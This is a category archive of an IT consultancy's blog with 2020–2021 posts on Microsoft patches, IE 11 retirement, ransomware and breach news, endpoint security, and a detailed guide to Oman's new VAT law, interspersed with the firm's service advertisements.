Archive for the ‘Security and Compliance’ category

Microsoft’s April 2021 Patch Tuesday

April 17th, 2021

Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities . As a best practice, Micorosft encourage customers you to turn on automatic updates.

Security hygiene and patch management are as important as ever as to protect from both sophisticated and common cybercriminal activity. Customers should ensure they are on the latest version of software with current security updates. . It is common for attackers to shift their efforts to exploit recently disclosed vulnerabilities before the latest updates or patches are installed, which is why it is so important that customers migrate to the latest supported software.

This month’s release includes a number of critical vulnerabilities to prioritize, including updates to protect against new vulnerabilities in on-premise Exchange Servers. Given the recent focus on Exchange vulnerabilities, we recommend customers install the updates as soon as possible to ensure they remain protected. Customers using Exchange Online are already protected and do not need to take any action.

More details on all of this month’s updates can be found in the Security Update Guide.. More information on best practice can be found in the following resources:

Critical Windows fix

February 14th, 2021

A critical flaw was discovered in Windows 10 that could allow hackers to unleash a devastating attack on PCs and render the devices useless. Customers who have automatic updates enabled are automatically protected from these vulnerabilities.

Last week Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074, CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). The two RCE vulnerabilities are complex which make it difficult to create functional exploits, so they are not likely in the short term. We believe attackers will be able to create DoS exploits much more quickly and expect all three issues might be exploited with a DoS attack shortly after release. Thus, we recommend customers move quickly to apply Windows security updates this month.

The DoS exploits for these CVEs would allow a remote attacker to cause a stop error. Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic.

It is essential that customers apply Windows updates to address these vulnerabilities as soon as possible. If applying the update quickly is not practical, workarounds are detailed in the CVEs that do not require restarting a server. These three vulnerabilities are unique and require separate workarounds depending on the exposure of an affected system; however, they can be thought of in terms of Internet Protocol version 4 (IPv4) and Internet Protocol version 6 (IPv6) solutions.

The IPv4 workaround simply requires further hardening against the use of Source Routing, which is disallowed in Windows default state. This workaround is documented in CVE-2021-24074 and can be applied through Group Policy or by running a NETSH command that does not require a reboot. The IPv6 workarounds are documented in CVE-2021-24094 and CVE-2021-24086, and require blocking IPv6 fragments, which may negatively impact services with dependencies on IPv6.

It is important that affected systems are patched as quickly as possible because of the elevated risk associated with these vulnerabilities, and downloads for these can be found in the Microsoft Security Update Guide.

Microsoft 365 apps and services will no longer support IE 11

February 3rd, 2021

Last August Microsoft announced that Microsoft 365 apps and services will no longer support Internet Explorer 11 (IE 11) by August 2021

Since November 30, 2020, the Microsoft Teams web app no longer supports IE 11.
To access Microsoft Teams, use the desktop app or a supported modern browser like the new Microsoft Edge.

Beginning August 17, 2021, the remaining Microsoft 365 apps and services will no longer support IE 11.
This means that after the above dates, customers will either be unable to connect to Microsoft 365 apps and services on IE 11 or have a degraded experience – new Microsoft 365 features will not be available or certain features may cease to work when accessing the app or service via IE 11.
This change will be difficult for some users,

Customers have been using IE 11 since 2013 when the online environment was much less sophisticated than the landscape today. Since then, open web standards and newer browsers—like the new Microsoft Edge—have enabled better, more innovative online experiences.

Respecting investments in IE 11 web apps
IE 11 isn’t going away1and customers’ own legacy IE 11 apps and investments will continue to work. Customers may have made business-critical investments in IE 11 legacy apps and those apps are still functioning. While bridging between modern and legacy apps, many customers may have no choice but to rely on a two-browser workaround of using IE 11 alongside a modern browser. However, with the new Microsoft Edge and Internet Explorer mode, customers don’t need an awkward workaround of one browser for some app,s and another for other apps. They can standardize on one browser and seamlessly experience the best of the modern web in one tab while accessing a business-critical legacy IE 11 app in another tab – all housed within the new Microsoft Edge.

With native integration in Microsoft management, security, and productivity tools, we recommend the new Microsoft Edge to address customers’ compatibility and secure remote work needs. Microsoft Edge has SmartScreen built-in and has the highest-rated phishing and malware protection as measured by two independent studies. We will Microsoft engineers are ready to help customers in case they run into compatibility issues. For more information, see the ‘Help is available’ section below.

Note: Using Internet Explorer mode in the new Microsoft Edge will not help to extend IE 11 access to Microsoft 365 apps and services beyond the dates listed above. Microsoft 365 apps and services will stop supporting IE 11 on the dates listed.

Microsoft Edge Legacy makes way for the new Microsoft Edge
The new Microsoft Edge is a browser built on the Chromium open source engine with the latest in Microsoft enterprise capabilities. Since its release in January 2020, millions of users have upgraded their home and work browsers to the new Microsoft Edge. Additionally, new devices and future Windows feature updates (starting with Windows 10, version 20H2) will contain the new Microsoft Edge.

Microsoft is ending support for the Microsoft Edge Legacy desktop app on March 9, 2021.
After March 9, 2021, the Microsoft Edge Legacy desktop app will not receive new security updates.

We recommend that customers first read the detailed Microsoft article about how to plan for deployment. The article guides customers through key questions and offers a path forward for major steps in the transition to the new Microsoft Edge.

Next, customers determine what type of support you may need..
Customers with Microsoft Unified Support can reach out to Microsoft for t hat support service for help transitioning to the new Microsoft Edge.

Microsoft FastTrack is available at no additional charge to customers with 150 or more paid seats of Windows 10 Enterprise. To get started, submit a Request for Assistance through the FastTrack site.

For those customers who prefer to get started on their own, there are self-guided deployment and configuration materials, complete with a series from Microsoft Mechanics, ready on our Docs site.

App Assure
It is natural for customers to be concerned about compatibility when it comes to business-critical apps and sites.. The App Assure promise is this: if customers’ web apps and sites work on IE 11, supported versions of Google Chrome, or any version of Microsoft Edge (including Microsoft Edge Legacy), those web apps and sites should work on the new Microsoft Edge.

If not, then they can contact App Assure for remediation support here or by email (ACHELP@microsoft.com).

Assistance is provided in Traditional Chinese and Simplified Chinese (support specialists speak Mandarin only), English, French, German, Italian, Japanese, Korean, Portuguese (Brazil), and Spanish.

To learn more about the new Microsoft Edge, customers can view the How to Get Started End User Guide.
( Internet Explorer 11 is a component of the Windows operating system and follows the Lifecycle Policy for the product on which it is installed.)

What is the true cost of software development?

January 9th, 2021

There ahs been much talk of both devops and citizen developers.
While these new paradigms are welcome and bring many benefits that does not mean that they replace other proven systems of software development.

There are reason why some consultancies quote significantly lower times to develop than other- usually tis lack of knowledge/awareness of what needs to be considered or they deliberately cut corners in areas like security, validation, documentation, testing, and so on.

If that sounds harsh then take a look a this recent post:
A report published last week by the Consortium for Information & Software Quality (CISQ) estimates poor software quality collectively cost companies in the U.S. an estimated $2.08 trillion in 2020.

Ransomware that is Devastating MySQL Servers – be aware

December 29th, 2020

PLEASE_READ_ME is an active ransomware campaign that has been targeting MySQL database servers and dates back to at least the start of this year. The attack chain is extremely simple and exploits weak credentials on internet-facing MySQL servers. There are close to 5M internet-facing MySQL servers worldwide.

MySQL servers have often been used as a low cost alternative for applications like Dynamics Ax Retail store databases.

250,000 databases are offered for sale in the attackers’ dashboard, from 83,000 successfully-breached victims.

If you are using MySQl databases then we strongly recommend that you immediately review your credentials security and reference the link above.

Rampant security attacks – be aware

December 18th, 2020

Cyber criminals have been relentless this year. Data breaches, network infiltrations, bulk data theft and sale, identity theft, and ransomware outbreaks all occurred over 2020. Remote workers account for up to 20% of cybersecurity incidents, and ransomware is on the rise,

This month alone ahs seen amjor breaches:
Leonardo SpA: Italian police arrested suspects believed to have stolen up to 10GB in sensitive corporate and military data from the defense contractor.
Flight Centre: A 2017 hackathon launched by the company was found to be the source of a leak involving credit card records and passport numbers belonging to close to 7,000 people.
Vancouver TransLink: A ransomware attack disrupted Compass metro cards and Compass ticketing kiosks for two days.
Absa: A rogue employee at the South Africa-based bank is thought to be responsible for the leak of personally identifiable information belonging to customers.
HMRC: The UK tax office was branded ‘incompetent’ due to 11 serious data breaches impacting close to 24,000 people.

Microsoft Warns Of New Malware That Wants To Infect Your Browser: Security experts at Microsoft have been tracking a new malware campaign that’s targeting Windows computers. It’s already claimed tens of thousands of victims and hijacked their web browsers.
Earlier this month Microsoft issued its final batch of security updates for Windows PCs in 2020, ending the year with a relatively light patch load. Nine of the 58 security vulnerabilities addressed this month earned Microsoft’s most-dire “critical” label, meaning they can be abused by malware or miscreants to seize remote control over PCs without any help from users

On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon.

FireEye, last week also said it had discovered a “global intrusion campaign” that it called “widespread” in a blog post published Sunday evening. “The actors behind this campaign gained access to numerous public and private organizations around the world,” FireEye discovered a supply chain attack trojanizing SolarWinds Orion business software updates in order to distribute malware we call SUNBURST.
The attacker’s post compromise activity leverages multiple techniques to evade detection and obscure their activity, but these efforts also offer some opportunities for detection.”

The U.S. Commerce Department on Sunday confirmed a security “breach” at one of its bureaus, and said federal authorities are investigating.
Reuters, the news agency first reported the hack, and cited sources who said the U.S. Treasury Department was also breached, and that hackers may have broken into other government agencies as well. The sources told Reuters that hackers may have been able to monitor staff emails at the agencies for months. And also Reuters reported that the affected bureau at the Commerce Department was the National Telecommunications and Information Administration. Subsequently the US issued an emergency warning that “nation-state” hackers hijacked software used by almost all Fortune 500 companies and multiple federal agencies to gain entry to secure IT systems.”

On Sunday the Washington Post reported that the attack had been traced to Russian state-backed hacking groups.

Its important that organisations are aware of the threats and have appropriate safeguards, polices and training. in the event of a breach its also important to have clearly defined policies of how to respond -its not just about dealing with the threat but also the consequences. For example Ireland’s Data Protection Commission fined Twitter €450,000 (~$550,000) for failing to notify the DPC of a breach within the 72-hour timeframe imposed by European Union’s General Data Protection Regulation (GDPR) and to adequately document it.

To cap it all Avast announced this week that more than three million Internet users have installed 15 Chrome plug-ins and 13 Edge plug-ins that contain malicious code, .

These add-ons contain code that can redirect user traffic to ads and phishing sites, collect personal information such as birth dates, email addresses, and active devices, collect search history, and download other malware to the user device., Avast researchers believe that the primary goal of this campaign is to redirect user traffic for money.

Avast said that it discovered the add-ons last month and found evidence that some of these have been active at least since December 2018, when users first started reporting problems with redirection to other websites.

Jan Rubin, a malware researcher at Avast, said they could not determine if the extensions contained malicious code from the beginning or if the code was added by an update when each of them reached a certain level of popularity. Many add-ons have become very popular, with tens of thousands of installations. In the case of most , this is achieved by presenting these as add-ons that can help users download multimedia content from various social networks, such as Facebook, Instagram, Vimeo or Spotify. Avast said that both Google and Microsoft reported their findings and that both companies are still checking the add-ons.

Two days after Avast released its findings,: Google has removed all 15 Chrome add-ons that Avast has found to contain malicious code, while most Edge add-ons are still available for download. Only Pretty Kitty, The Cat Pet and SoundCloud Music Downloader have been removed.

Below is a list of Chrome add-ons that Avast said contain malicious code:

Direct Message for Instagram

DM for Instagram

Invisible mode for Instagram Direct Message

Downloader for Instagram

App Phone for Instagram

Stories for Instagram

Universal Video Downloader

Video Downloader for FaceBook™

Vimeo™ Video Downloader

Zoomer for Instagram and FaceBook

VK UnBlock. Works fast.

Odnoklassniki UnBlock. Works quickly.

Upload photo to Instagram™

Spotify Music Downloader

The New York Times News

Here’s a list of Edge plug-ins that contain malicious code:

Direct Message for Instagram™

Instagram Download Video & Image

App Phone for Instagram

Universal Video Downloader

Video Downloader for FaceBook™

Vimeo™ Video Downloader

Volume Controller

Stories for Instagram

Upload photo to Instagram™

Pretty Kitty, The Cat Pet

Video Downloader for YouTube

SoundCloud Music Downloader

Instagram App with Direct Message DM

Endpoint security against cybercrime – 7 key questions

December 17th, 2020

7 Vital Questions to Ask

Endpoint security has never been more important, more complex—or more challenging— than it is today. Given the multitude of solutions and of vendors , it is very difficult to sort through all of the competing claims to find what’s truly effective.

1. Will this solution run on all the devices in my environment?
2. How long will deployment take?
3. What will the members of my team need to know or learn in order to work with this platform
4. What types of preventative controls are in place?
5.From where does the vendor get its threat intelligence?
6. How does this solution integrate with incident response workflows? 7 Is 24×7 professional support available from the vendor?
7. Can this solution be integrated with other security services, products, or platforms from the same vendor to reduce costs and complexity?

Why Comodo?- Zero Percent Infection and Breaches for Customers

Comodo offers the only cybersecurity that stops undetectable threats.
Cloud-native cybersecurity with auto-containment stops ro-day threats that AI, ML, & other technologies miss.


Historical s scores and statistics from millions of endpoints on thousands of different networks of enterprise customers. It shows zero percent infection and breaches.

With Comodo you can “Protect without Detection.” The cloud-native framework delivers you zero day protection against undetectable threats while defending your endpoints from known threat signatures. Automatic signature updates simplifies deployment across your entire environment to lower operational costs

Contact us about Advanced Endpoint Protection 0097143365589

OMAN VAT update November 2020 -ask Synergy Software Systems

November 27th, 2020

The International Monetary Fund, Oman’s economy is expected to shrink by 10 percent this year, the biggest contraction in the Gulf, and its fiscal deficit could widen to 18.3 percent of GDP from 7.1 percent last year.

Last year Oman enacted on June 15 an electronic system for registering excise taxpayers, setting the stage for residents to be taxed on products deemed harmful to public health and the environment after a 90-day grace period. The Omani “sin tax” involves a 100% levy on tobacco, pork, alcohol and energy drinks and a 50% tax on carbonated drinks. This year it increased the tax on alcohol to 100%

Oman announced that it expects to introduce an income tax on high earners in 2022, the finance ministry said in a 2020-2024 economic plan, new details of which were published late on Sunday, as the Gulf state seeks to restore finances battered by low oil prices.

The plan also aims to redirect state subsidies to those groups who need it, rather than subsidize all users. Electricity and water tariffs will be changed gradually in the coming years, the document said.

Meanwhile Oman Royal Decree No. 121/2020 was passed, and the VAT Law was published by the Official Gazette of Oman on 18 October 2020. The date of implementation is expected to be 16 April 2021 (i.e. 180 days from the date of publication of the VAT Law). The Executive Regulations will clarify certain aspects of the VAT Law and those are expected to be published soon by the Official Gazette.
In the next 4-5 months’ time, businesses in Oman should consider the implementation impacts on the entire business, operations, procurement, sales, administration, human resources, information technology, etc. We advise an internal steering committee with a representative from each function.

The VAT Law published is exhaustive with the benefit of the experience of other GCC VAT Laws.

Registration
Muscat has set a voluntary registration threshold of 19,250 Omani riyals and mandatory registration for businesses and individuals with turnover of at least 38,500 riyals.
Non-resident businesses that provide taxable supplies will be required to VAT register. Unlike resident businesses, there will be no minimum threshold that needs to be met before nonresident businesses must register for VAT with Omani authorities. A non-resident business will probably have an option to appoint an agent in Oman – that does not have to be jointly and severally liable, nor a fiscal representative of the principal. More detail is expected in the executive regulations.
Rules for digital service providers based outside of Oman are still in development. Digital service providers based outside of Oman, as well as e-commerce services, will need to pay careful attention to regulations over the coming months to ensure compliance.

VAT impact assessment,
Administration:

• VAT registration and gathering information from customers
• VAT recovery issues and VAT grouping
• VAT litigation avoidance strategies

The VAT fiscal impact,
• budgets, cash-flow, working capital, etc. Financial record keeping it is to be expected, that any company found to have kept inadequate records or issued incomplete invoices may be subject to potentially severe fines.
IT impact,
Ascertain the impact on the accounting system software and hardware such as gathering and loading data, developing statutory reports, amending other financial reports.
• The law sets out rules for proper record keeping and invoicing. All VAT-registered entities must keep specified records, including customs and invoicing documentation, and retain these records for at least 10 years. Archive storage space/cost and the impact of future planned system upgrades needs to be considered.
• The law specifies mandatory filing requirements, including documentation required when filing VAT returns. Now might be a good time to look at both document management systems and RPA e.g. for data entry validation, or VAT reconciliation or for data entry to government websites.

Process and documentation impact,
Redefine the processes under VAT – quotes, contracts and terms and conditions will need revision. Update your process documents for audit purposes.
VAT is a transaction-based tax, so the underlying legal documentation (ie, the contract or terms) detailing the supply of a good or service is the start of the review process. Review your contracts to determine the Omani VAT impact. Does the contract account for VAT (and/or other taxes)? When a contract is ‘silent on VAT’, this could well mean that the amounts specified therein are treated as inclusive of VAT. To avoid misunderstanding, such “silent” contracts should ideally be updated. Parties may need to (re)negotiate the considerations to account for non-recoverable VAT.
Businesses should also review the contracts to determine whether they reflect economic reality. Are the parties to the contracts the actual supplier and recipient of the service or goods? This is important in relation to the invoices issued by the supplier and, the right of the recipient to potentially recover VAT.
To apply the correct VAT treatment of the supply of a service or good, the supplier may need to obtain additional information from the recipient.
Contracts and/or terms and conditions may need to be revised in order to collect or store such information and to ascertain the correct Omani VAT treatment of the services or goods supplied.

Invoicing
Chapter 8 of the law outlines invoicing requirements. Any person making a taxable supply of goods or services will be required to issue a tax invoice, which may be in the form of an e-invoice rather than in paper format.
The details required to be disclosed on a tax invoice, the language in which invoices must be issued, rules for simplified tax invoices, and other similar requirements are expected to be set out in the executive regulations. Currently, it is expected that invoicing will be permitted in English and that use of Arabic will not be compulsory. The executive regulations are expected to specify when a business will be exempt from issuing tax invoices.
The requirement to issue tax invoices is also triggered in other circumstances, e.g., the receipt of advance payments that generate a requirement to account for VAT, or the making of deemed supplies.
For businesses issuing invoices in a foreign currency, the VAT amount must be stated in Omani Rials (OMR) and be converted using the average purchase and sale price of the relevant currency published by the Central Bank of Oman on the date on which the VAT is due. The tax authorities are expected to clarify whether any other conversion methods will be permitted.
This may affect your accounting system because you may sue different rates contractually or for corporate budgets or period end revaluation.
User training
e.g.
– how to add a customer TRN,
– how file a return,
– how to draft anew quote or contract.
– system changes

Transition management
Based on the VAT implementation in other GCC countries, there are challenges to be expected during the process. Complacency is a major risk, as is starting the implementation and transition activity late, and not allowing adequate time to test system and process changes.
Consider for example instances in which goods or services are paid for prior to the law coming into effect, but are only delivered once the law is in place?
The regulations indicate that VAT will have to be paid in such circumstances. However, further questions are raised in terms of invoicing and filing. More details are expected to be provided on precisely how compliance will function under these transitional circumstances
Appoint a proven implementation expert, to walk you through each type of business transaction and its treatment to avoid penal consequences.

Place of Supply
Understanding the concepts of “Supply”, “Place of Supply” and “Time of Supply” is critically important for effective implementation of Oman VAT. The place of supply shall be determined on the basis of the final consumption place of the supply, regardless of the product originating place,. When the supplies are consumed within Oman, they shall be levied to VAT. Services supplied outside of Oman to its residents will be treated as supplies in Oman. Some exemptions will apply to certain services provided to end-users outside of Oman.

For services, the place of supply depends on (i) the type of recipient (is the service business-to-business or business-to-consumer?) and (ii) the type of service. Special rules may apply to certain services such as real estate related services or electronically supplied services (or e-services). Real estate related services and e-services are always deemed to be supplied where the real estate is located respectively where the recipient is located. Particularly, overseas business-to-consumer suppliers of e-services should be aware that they will need to charge, collect and remit Omani VAT to the tax authorities.

Businesses in Oman which import services or goods may need to account for Omani VAT by means of a reverse charge mechanism. Such VAT would in principle be recoverable if and to the extent the business renders VAT taxable activities.
e-services are subject to VAT when the recipient of such services is located or residing in Oman. A reverse charge mechanism applies in case of business-to-business supplies of e-services, under which the burden of VAT is shifted from an overseas supplier to the Omani recipient. As of April 1, 2021, foreign and domestic e-service suppliers should obtain customer information (ie, verified VAT number) to determine their customers’ status (business or consumer).

Free zones
Businesses operating within free zones, special economic zones and duty free zones are likely to be subject to special VAT rules. Concessional VAT treatments are likely to be applicable for supplies within, to and from the customs duty suspension zones, free zones or special zones. Importers, who avail themselves of customs duty suspension benefits under the GCC Common Customs Law, would also likely be eligible for similar benefits under VAT. Dealing with this may require your accounting system to be able to handle a ‘reverse charge’ process.
Responsible person
All businesses will be required to have a responsible person who oversees VAT compliance. This person is liable to any penalties for failures to comply. This is similar to the UK’s Senior Accounting Officer concept, where a person can be fined up to £5,000 for not taking appropriate actions to stay compliant.
In Oman, the responsible person can personally be fined up to 10,000 OMR (nearly £20,000) with a prison sentence of up to one year. The fine can be doubled and the jail sentence doubled for repeat offenders. Any late submissions are subject to a 1% fine on the owed tax every month.
The severity of the punishments put the responsible person under considerable pressure to get things right. In a complex business, multiple users make VAT decisions, often with minimal VAT training and if you are relying on others to input data correctly then it’s imperative they do it correctly as the consequences of non-compliance are life changing.
If I were in this position, I would be doing everything in my power to achieve full compliance by using the best resources and tax technology available to me. I would also document all my recommendations.
The sensible way to mitigate the possibility of non-compliance is to minimise the risk of human error. For large businesses this means automating their VAT determination. Integrated finance/erp systems and RPA are two obvious solutions.
Most enterprise level businesses will be processing thousands of transactions a day, so human error will naturally occur when choosing tax codes, especially while VAT is a new concept in the country and wider region. Eventually staff become complacent or change jobs and new hires induction and training is less risky with automated systems.
Contact us for more information on systems we have already localised for VAT compliance, and how RPA automation can reduce cost and risk.

Exemptions:
Supply of foodstuffs, medicines and medical equipment is to be determined by the decision of the President, after coordination with the competent authorities. Some of the basic foodstuff will also be exempted from five per cent VAT. In addition to financial services, provisions of healthcare and education and their related goods and services, other exemptions are undeveloped lands (bare lands); resale of residential properties; local passenger transport; and renting real estate for residential purposes, Investment gold, silver and platinum, supplies of international goods and passenger transport and related services; supply of rescue aircrafts, boats and auxiliary ships; supply of crude oil and its oil derivatives and natural gas; import of maritime, air and land transport vehicles for transport of goods for commercial purposes as well as import of related services; and supplies for the disabled and charity organisation have been designated as zero rated.

Sector challenges

Retail sector: Certain food items may be zero-rated as per the VAT Law. The list of items which are zero-rated is not yet published. Businesses need to map the product with the list (consider the composition of the product, purpose, etc.). Incorrect classification could lead to a wrong zero-rating position.

Pharma sector: Medicines and medical equipment are zero-rated. However, the zero-rating is expected to apply in cases where the medicines are approved by / registered with the Competent authorities. The approval could be generic, or it may apply for certain period / certain class of medicines. For each sale / purchase there may need to be validation whether the medicine is approved to apply zero-rating.
Financial services: Banks and large financial institutions should classify their products into margin / fee-based income because margin is exempt from VAT and fee-based income is subject to VAT. Businesses must also consider the customer location because margins earned from a customer outside Oman will be zero-rated.
Certain charges which are penal may have a different VAT treatment. In the majority of the transactions, Islamic finance products will follow the treatment of non-Islamic finance products; however, there are some exceptions. The financial services sector may have a substantial portion of income which could be exempt, input tax apportionment.
Logistics sector: International transportation, i.e. movement from Oman to outside Oman and vice-versa is zero-rated whereas local passenger transport is exempt and local transport of goods is subject to VAT at 5%.
However the entire transportation journey involves freight forwarder, agent, shipping line, feeder operator, etc,. so ascertain the VAT impact on different charges for providing services. More clarity is expected from the Executive Regulations.
Export of services: Providing services to a customer based outside Oman is zero-rated subject to certain conditions. One important condition is that the benefit of services should accrue to the customer outside Oman. In other words, benefit should not be received by any other person in Oman. This may be subjective and depend on the arrangement with the customer and the nature of charge / services. It is advisable to identify such arrangements and to evaluate the VAT treatment. Other GCC countries are divided in terms of VAT treatment on such transactions.
It is likely that sector-specific guidance will be issued by the Oman Tax Authority to clarify the VAT treatment for different industry verticals.

Exempted Supplies from VAT
Some supplies based on transactions and others on nature will be exempted from VAT.
Supplies exempted based on transaction include:
• Any supplies transacted between the same group of the VAT group (e.g. a parent company and subsidiary or branches)
• Any supplies transacted between the same group of the VAT group (e.g. a parent company and subsidiary or branches)
• Business ownership transferred by one taxable person to another
• Any insurance claims made within the Sultanate of Oman
• All imports made by Armed forces, Army, and Air force in Oman
• All imports made by diplomats, embassies, consular bodies, international organizations. (subject to conditions)
• Supplies imported for charities and not-for-profit organizations
• Supplies brought to Oman by travellers and passengers as gifts or personal use only
• All supplies imported for people with special needs including medical aid equipmentIn addition to receivers’ or person utilizing the supplies, some supplies will be exempted from VAT by nature of product/service:
• Financial Services
• All Health Care services including the imports of medical supplies and equipment
• All educational services including the import of supplies for educational purpose
• Resale of the Real-estate and leasing of real estate properties for residential purposes only
• Non-developed land i.e. empty or barren land
• All local means of transportation for passengers

Registration process

The registration process is likely to start in January 2021 according to the Tax Authority in Oman. All registration process will be through its online e-services portal. The Applicant will have to provide the company ownership and business-related information. The necessary information required to register with the portal may include:
• Copy of trade license
• ID card and Passport copies of business owner and partners
• Company’s Memorandum of Association
• Contact details, E-mail for registration and other contact details
• Bank account details
• The income statement for the last 12 months
• Nature of business and activities performed
Each registering entity will be allotted a VAT registration identification number other than their currently held tax number.

Filing returns
Article 72 of the law prescribes the following minimum information to be provided in the periodical return:
• Value of taxable and exempt supplies;
• Total value of imported goods;
• Amount of output VAT on revenue transactions;
• Amount of recoverable input VAT on costs; and
• Net VAT due for the period.
Article 73 provides an option to amend tax returns within a period of 30 days from the date of discovery of any error or omission.

VAT payment
VAT will be payable to the tax authorities within 30 days from the end of the VAT period, together with the filing of the return. Unpaid VAT will be subject to a penalty of 1% of the tax due per month or part month, unless waived by the tax authorities in accordance with article 82 of the law

Mode of Payment
All entities entitled against the VAT requirements will have to deposit the VAT returns electronically through the E-Services portal.

VAT recovery
VAT recovery will normally only be possible in the case when the recipient has received a tax invoice which adheres to the Omani VAT invoice requirements. These requirements include details on the supplier and recipient. Any incurred VAT on incorrectly issued invoices (e.g, wrong issuing party, wrong VAT rate and/or other missing requirements) may not be recoverable. Businesses operating in Oman should define policies to ensure a proper VAT administration and invoicing.

A VAT group is a facility that allows two or more taxpayers to be registered for VAT purposes as a single taxpayer. The VAT group scheme is of interest to taxpayers with a restricted VAT recovery rate which is part of a group with non-restricted businesses. Inclusion of such payers in the VAT group may provide for (additional) VAT recovery.
Although VAT may be recoverable, the recovery itself generally takes a certain period of time. This cash flow aspect should be one of the considerations during the (re)negotiation process, particularly with large supply contracts spanning several years.

If you need advice on preparing for VAT and updating and automating your financial or erp systems then we have implemented VAT for more than a hundred companies in UAE, KSA and Bahrain. we are gold Partners for Microsoft Dynamics 365 Fiinance, Infor Sunsystems and UiPAth RPA.

Call u son 0097143365589

Dynamics 365 Dubai partner Synergy Software Systems

November 12th, 2020

There is much talk about digital transformation but what does it mean for your company?
For selected Enterprise clients we work with Microsoft to deliver curated workshops to ‘inspire-quantify-empower- achieve’

Further to our recent seminar contact us now to avail of free upgrade and migration reviews to Dynamics 365 Finance and Supply Chain

Synergy Software Systems is the oldest Dynamics. partner in the EMEA region and has implemented solutions on Axapta 2.3 Axapta 3 Dynamics Ax4, Ax 2009, Ax2o12, Ax2012 R2, Ax2012 r3, and of course Dynamics 365.

We have also implemented every version of Dynamics CRM since version 3.

As Microsoft partners we also implement and support Office 365 and Microsoft365 . Exchange server, Teams, and the azure stack

We also have a practise for Power Bi/Power Apps/Power Automate, so we are able to help you to fully leverage the entire Dynamics 365 platform.

To take your business on the first step into the cloud with Dynamics call us: 009714 3365589

Massive increase in cybercrime.

November 6th, 2020

Disturbing increase in cyberthreats in the second quarter of the year, more than 400 new cyberthreats were recorded every minute, according to a new report from cybersecurity firm McAfee. Nw malware samples also grew by 11.5 percent for the period.

PowerShell malware and Covid-19-themed attacks dominated the landscape. Malicious Donoff Office document attacks propelled new PowerShell malware upwards by 117 percent. The documents behave as TrojanDownloaders by using Windows Command to launch PowerShell, which then downloads and executes malicious files.
McAfee claims Donoff also played a “ critical role” in driving the 689 percent surge in PowerShell malware in the quarter prior to this one.

Covid-19 was another theme exploited by cybercriminals in the second quarter of the year. McAfee’s network, boasts more than a billion sensors, and registered a 605 percent increase in Covid-19-related attacks compared to Q1.

“,,,,,,,,, a deluge of malicious URLs, attacks on cloud users and capable threat actors leveraging the world’s thirst for more information on Covid-19 as an entry mechanism into systems across the globe,” said Raj Samani, McAfee Fellow and Chief Scientist.

McAfee said there were almost 7.5 million external attacks on cloud user accounts in the quarter. According to the firm, all major industries were affected, including: financial services, healthcare, public sector, education, retail, technology and more.

In 2019, the Maze ransomware group introduced a new tactic known as double-extortion, which is when attackers steal unencrypted files and then threaten to release them publicly if a ransom is not paid. Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays a ransom. ther ransomware operations, who began to create data leak sites used to publish victims’ stolen files.As part of this double-extortion tactic, most ransomware operations require a victim to pay a single ransom that will provide both a decryptor for their encrypted files and a promise not to share and to delete stolen files.Some ransomware operations, like AKO/Ranzy, demand two ransom payments, one for the decryptor and another not to publish stolen data.

In the recently released Coveware Q3 2020 ransomware report r we learn that some ransomware gangs do not keep their promise to delete stolen data after a ransom is paid. Certain groups are leaking stolen data after a ransom was paid, using fake data as proof of deletion, or even re-extorting a victim using the same data that was paid not to be released.

Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.

Netwalker: Data posted of companies that had paid for it not to be leaked

Mespinoza: Data posted of companies that had paid for it not to be leaked

Conti: Fake files are shown as proof of deletion

Unlike a ransomware decryptor, which a threat actor can’t take away once given, there is no way for a victim to know for sure if a ransomware operation is deleting stolen data after a ransom payment is made. Due to this, Coveware says that it does not make sense to pay a ransom as there is no way to know for sure it will not be used to extort you further in the future. With this in mind, Coveware tells victims to expect the following even if they do decide to pay, so their data is not released:

– The data may not be credibly deleted. Victims should assume it will be traded to other threat actors, sold, or held for a second/future extortion attempt

– Stolen data custody held by multiple parties and not secured. Evenwhenf the threat actor deletes a volume of data following a payment, other parties that had access to it may already have made copies so that they can extort the victim in the future

– The data may get posted anyway by mistake or on purpose before a victim can even respond to an extortion attempt

Companies should automatically assume that their data has been shared among multiple threat actors and that it will be used or leaked in some manner in the future, regardless of whether they paid. They should treat the attack as a data breach and properly inform all customers, employees, and business partners that their data was stolen as required by law.

Doing this may b e embarrassing and painful but at least the companies look better for trying to do the right thing and gives those who were exposed the ability to monitor and protect their accounts from fraud.

A recent example of such an attack is Campari Campari Group an Italian beverage company known for its popular liquor brands, including Campari, Frangelico, SKYY vodka, Epsolon, Wild Turkey, and Grand Marnier. It was recently hit by a Ragnar Locker ransomware attack, where 2 TB of unencrypted files was allegedly stolen. To recover their files, Ragnar Locker is demanding $15 million.

As proof that they stole data, the ransom note contains eight URLs to screenshots of some of the stolen data. These screenshots are for sensitive documents, such as bank statements, a UK passport, employee U.S. W-4 tax forms, a spreadsheet containing SSNs, and a confidentiality agreement.

Ragnar Locker claims to have encrypted most of Campari Group’s servers from twenty-four countries and are demanding $15,000,000 in bitcoins for a decryptor. This price also includes a promise to delete data from their file servers and not publish or share the data, as well as a network penetration report and recommendations to improve security.

Ragnar Locker has been involved in other large attacks this year, including ones on Portuguese multinational energy giant Energias de Portugal (EDP) and French maritime transport and logistics company CMA CGM.

We advise all companies to regularly review and update their security policies, training and cyberdefence solutions.
Ask us about end point solutions or consider whether managed cloud hosted systems is preferable.

009714336589